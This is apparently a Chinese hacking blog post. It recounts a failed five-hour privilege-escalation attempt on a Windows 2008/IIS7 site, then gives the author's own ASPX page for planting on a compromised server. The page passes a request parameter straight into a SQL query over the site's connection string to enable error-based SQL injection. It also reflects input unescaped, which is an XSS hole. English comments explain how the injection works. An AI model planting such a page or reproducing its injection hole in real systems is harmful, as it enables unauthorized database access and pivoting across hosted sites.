昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
其实中间用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
代码量不多,自己写个拉倒了。烦死了。

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
        <script language="c#" runat="server">

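void page_init(object sender, EventArgs e)
{
    // DELIBERATELY VULNERABLE. The page title calls this an injection test page:
    // the request parameter is concatenated straight into the SQL text so that a
    // caller-supplied payload reaches the database through this site's own
    // connection string. Never leave this on a production site; remove it as
    // soon as the test is finished.
    //
    // Input: ?xxser=<value>. Request.Params merges QueryString, Form, Cookies and
    // ServerVariables, so the value can arrive through any of those.
    string i = this.Page.Request.Params["xxser"];

    // Without the parameter the statement would read "... where 列名= " and the
    // server would only throw a syntax error; say so instead of wasting a
    // round trip.
    if (string.IsNullOrEmpty(i))
    {
        Response.Write("missing xxser");
        return;
    }

    // "连接名" must match the name of an entry under <connectionStrings> in
    // web.config; an unknown name yields null here and a NullReferenceException.
    string cs = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;

    // using/finally returns the pooled connection even when the injected payload
    // makes the command throw. That is the normal case for error-based probing,
    // and the original leaked a connection on every such failure.
    using (System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection(cs))
    using (System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn))
    {
        conn.Open();

        // ExecuteNonQuery returns -1 for a SELECT, so x is not a row count; it
        // only shows the statement ran. Use ExecuteReader if the result set
        // itself is wanted. Any SqlException propagates to the ASP.NET error
        // page, which is what error-based injection relies on (customErrors
        // must be off for the message to be visible).
        int x = command.ExecuteNonQuery();

        // Echoes the raw parameter back unescaped — a reflected XSS in its own
        // right, tolerable only because this page is a throwaway test tool.
        Response.Write(i + "\n");
        Response.Write(x);
    }
}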

        </script>
    </div>
    </form>
</body>
</html>